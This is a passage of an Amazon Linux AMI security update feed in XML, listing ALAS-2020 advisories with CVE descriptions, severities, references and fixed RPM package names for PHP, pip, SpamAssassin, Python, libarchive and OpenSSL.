arch="i686"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1340</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1340: medium priority package update for python-pip</title><issued date="2020-02-04 22:44:00" /><updated date="2020-02-07 18:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11324:
The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument.
1702473: CVE-2019-11324 python-urllib3: Certification mishandle when error should be thrown
CVE-2019-11236:
In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.
1700824: CVE-2019-11236 python-urllib3: CRLF injection due to not encoding the '\r\n' sequence leading to possible attack on internal service
1700824:
CVE-2019-11236 python-urllib3: CRLF injection due to not encoding the '\r\n' sequence leading to possible attack on internal service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11236" title="" id="CVE-2019-11236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11324" title="" id="CVE-2019-11324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python35-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python35-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python26-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python36-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python36-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package><package name="python34-pip" version="9.0.3" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python34-pip-9.0.3-1.27.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1341</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1341: medium priority package update for spamassassin</title><issued date="2020-02-04 22:46:00" /><updated date="2020-02-07 18:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12420:
In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.
1784984: CVE-2019-12420 spamassassin: crafted email message can lead to DoS
CVE-2018-11805:
In Apache SpamAssassin before 3.4.3, nefarious CF files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA 3.4.3, we recommend that users should only use update channels or 3rd party .cf files from trusted places.
1784974: CVE-2018-11805 spamassassin: crafted CF files can be configured to run system commands without any output or errors
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11805" title="" id="CVE-2018-11805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12420" title="" id="CVE-2019-12420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="spamassassin" version="3.4.3" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-3.4.3-2.2.amzn1.x86_64.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.3" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-debuginfo-3.4.3-2.2.amzn1.x86_64.rpm</filename></package><package name="spamassassin" version="3.4.3" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-3.4.3-2.2.amzn1.i686.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.3" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-debuginfo-3.4.3-2.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1342</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1342: medium priority package update for python27 python35 python36</title><issued date="2020-02-10 23:33:00" /><updated date="2020-02-13 00:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16935:
The documentation XML-RPC server in Python through 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has XSS via the server_title field. This occurs in Lib/DocXMLRPCServer.py in Python 2.x, and in Lib/xmlrpc/server.py in Python 3.x. If set_server_title is called with untrusted input, arbitrary JavaScript can be delivered to clients that visit the http URL for this server.
1763229: CVE-2019-16935 python: XSS vulnerability in the documentation XML-RPC server in server_title field
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16935" title="" id="CVE-2019-16935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.131.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.131.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.131.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.131.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.25.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.25.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.10" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.10-1.16.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.10-1.16.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.10" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.10-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1343</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1343: important priority package update for libarchive</title><issued date="2020-02-17 19:38:00" /><updated date="2020-02-19 23:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18408:
archive_read_format_rar_read_data in archive_read_support_format_rar.c in libarchive before 3.4.0 has a use-after-free in a certain ARCHIVE_FAILED situation, related to Ppmd7_DecodeSymbol.
1769979: CVE-2019-18408 libarchive: use-after-free in archive_read_format_rar_read_data when there is an error in the decompression of an archive entry
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18408" title="" id="CVE-2019-18408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libarchive-devel" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="bsdtar" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="14.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-14.15.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-14.15.amzn1.i686.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="14.15.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-14.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1344</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1344: low priority package update for openssl</title><issued date="2020-02-17 19:39:00" /><updated date="2020-02-19 23:20:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1563:
In situations where an attacker receives automated notification of the success or failure of a decryption attempt an attacker, after sending a very large number of messages to be decrypted, can recover a CMS/PKCS7 transported encryption key or decrypt any RSA encrypted message that was encrypted with the public RSA key, using a Bleichenbacher padding oracle attack. Applications are not affected if they use a certificate together with the private RSA key to the CMS_decrypt or PKCS7_decrypt functions to select the correct recipient info to decrypt. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).
1752100: CVE-2019-1563 openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1563" title="" id="CVE-2019-1563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.151.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.151.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.151.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.151.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1345</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1345: important priority package update for java-1.8.0-openjdk</title><issued date="2020-02-20 01:00:00" /><updated 